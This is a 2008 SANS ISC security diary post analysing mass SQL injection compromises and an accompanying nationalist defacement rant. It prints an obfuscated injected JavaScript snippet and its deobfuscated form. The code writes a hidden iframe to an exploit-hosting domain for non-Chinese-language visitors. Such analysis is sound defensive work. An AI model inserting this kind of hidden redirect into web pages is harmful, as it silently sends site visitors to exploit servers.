Threat Level: green Handler on Duty: Daniel Wesemann

SANS ISC InfoSec Handlers Diary Blog


Sign Up for Free!   Forgot Password?
Log In or Sign Up for Free!

War of the worlds?

Published: 2008-05-14
Last Updated: 2008-05-14 00:31:33 UTC
by Bojan Zdrnja (Version: 1)
0 comment(s)

There have been a lot of discussions going on about these injection attacks. The one thing in common so far has been that the culprits are abusing security vulnerabilities in various web applications, mainly SQL injection.

Exploiting of such vulnerabilities became relatively easy (since there are many vulnerable applications that use similar backend logic), so the bad guys started releasing various tools that enable them to compromise sites automatically. I analyzed one such tool at http://isc.sans.org/diary.html?storyid=4294, which was probably used for a lot of SQL injection attacks we have seen lately (but be aware that other similar tools exist and are actively used in the underground, one such tool in use with botnets was analyzed by Joe at SecureWorks, http://www.secureworks.com/research/threats/danmecasprox/).

While the motive for this is more or less standard – steal credentials or virtual goods so you can convert/sell that for real money (Mike and Steven from Shadowserver posted very nice articles at http://www.shadowserver.org/wiki/pmwiki.php?n=Calendar.20080507 and http://www.shadowserver.org/wiki/pmwiki.php?n=Calendar.20080513) - while analyzing one such site today I saw an interesting rant, presumably by the author.

The site has already been mentioned multiple times (www.ririwow.cn, which appears to be finally taken down). The majority of attacks actually pointed to this site which happily served some exploits to the end user. However, this time the main index.htm file had this text appended at the bottom:

"This is a mass invasion.        Safeguard the motherland's dignity!
F*** FRANCE!  F*** CNN!  I WILL ATTACK you ALWAYS  !
I love my motherland!
sorry
Please understand that I
IF YOU WANT TO SAY SOMETHING .
PLEASE SEND EMAIL TO kiss117276@163.com "

(language edited)
Interesting. While this could have been added by anyone, I found another interesting thing thanks to a heads up from our friend Paul from pauldotcom.com. Paul analyzed a compromised site which had this piece of JavaScript inserted:

eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode
(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)d[e(c)]=k[c]||e(c);k=[function(e){return[e]}];e=functio
n(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);returnp}('8(b.e==\'i-2\
'){}4{3.g("<9d=7:\/\/h.c.2\/a.6 f=15=0><\/9>");}',62,19,'|100|cn|document|else|height|htm|http|if|iframe|index
|navigator|ririwow|src|systemLanguage|width|writeln|www|zh'.split('|'),0,{}))

After deobfuscating the code, we get this:

if (navigator.systemLanguage=='zh-cn'){}else{document.writeln("<iframe
src=http://www.ririwow.cn/index.htm" width=100 height=0></iframe>");}

In other words, the code checks if the system language variable is set to ZH-CN (which is set on systems running in Chinese) and redirects you to the site hosting exploit only if that is not true. So the rant might really be from the author, after all since the code is attacking all non-Chinese machines. Are we getting more serious with this or the bottom line is still (and only) information stealing and money.

--

Bojan

Keywords: malware
0 comment(s)
Diary Archives